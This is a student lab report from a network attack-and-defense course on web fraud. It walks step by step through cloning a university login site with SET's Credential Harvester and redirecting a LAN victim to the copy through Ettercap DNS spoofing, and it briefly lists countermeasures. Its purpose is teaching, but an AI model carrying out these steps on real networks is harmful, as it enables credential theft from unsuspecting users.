标签:strong website 情况 pre lis 选中 关系 /etc/ att
本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有
在局域网中,攻击者很容易冒充网关对被害者进行DNS欺骗从而进行DNS spoof攻击
直接使用ip访问网站
对之前访问过的网站设置静态的DNS缓存表,不接收DNS更新信息
对从未访问过的网站在首次访问时下载并检查证书
本次实验操作简单原理也不复杂,也就意味着利用假冒网站和DNS欺骗获取敏感信息是非常非常容易的一件事。以后访问证书有问题的网站时要求输入敏感信息时可就得多留意了,还有就是不敢随便连接公共的局域网进行敏感操作了。
本次实验会用到80端口所以需要检查一下80端口的网络连接情况
netstat -tupln |grep 80
如果没有结果说明没有进程在使用80端口,如果有返回结果可以看到使用80端口的进程的PID也就是进程编号,可以使用kill
命令杀死即关闭进程
kill (进程编号)
使用gedit
打开Apache的ports.conf
文件,将listen
的端口号设置为80,保存并退出
gedit /etc/apache2/ports.conf
apachectl start
或者
service apache2 start
setoolkit//启动SET工具
1 //选择Social-Engineering Attacks社会工程学攻击
2 //选择Website Attack Vectors网页攻击
3 //选择Credential Harvester Attack Method身份认证信息收集攻击
2 //选择Site Cloner克隆网站攻击
192.168.232.131//输入克隆网站的ip地址,就是受害者要待会要访问的网站,ip地址设置为攻击者的ip地址
www.besti.edu.cn//输入被克隆网站的ip地址,就是克隆网站会伪装成被克隆网站的样子以欺骗受害者
如果询问要不要禁用apache:Do you attempt to disable Apache就输入y再按回车即可
现在被害者用浏览器访问克隆网站,可以看到克隆网站http://192.168.232.131
和被克隆网站http://www.besti.edu.cn
一模一样
被害者在克隆网站上输入的登录信息会被收集并发送给攻击者
ifconfig eth0 promisc//将攻击者主机网卡切换为混杂模式,以便可以收到局域网中被害者的DNS请求
gedit /etc/ettercap/etter.dns//打开攻击者的DNS缓存表
现在就是要在DNS缓存表中写入一个域名到ip地址的映射关系
被害者在浏览器输入某一个域名的时候,被害者主机发出DNS请求询问域名对应的ip,攻击者发出DNS回应告诉被害者这个域名对应的ip
所以说要在攻击者的DNS缓存表里写入一个正确的域名到一个错误的ip的映射关系
www.besti.com A 192.168.232.131
ettercap -G//启动Ettercap
点击Sniff->unified sniffing
,选择eth0->ok
对网卡eth0进行监听
点击Hosts->Scan for hosts
对活跃主机进行扫描
点击Hosts->Hosts list
查看活跃主机列表,选中网关ip:192.168.232.2并点击Add to Target 1
,选中被害者主机ip:192.168.232.132并点击Add to Target 2
,这样设置是要在待会被害者主机发出DNS请求的时候,攻击者要冒充网关发出DNS应答
点击Plugins—>Manage the plugins
,选择dns_spoof
现在受害者在cmd中ping克隆网站www.besti.com
,可以看到ip地址是192.168.232.131说明已经欺骗成功了
受害者访问www.besti.com
就被带到克隆网站
2017-2018-2 20155228 《网络对抗技术》 实验七:网络欺诈防范
标签:strong website 情况 pre lis 选中 关系 /etc/ att
原文地址:https://www.cnblogs.com/besti20155228/p/9013436.html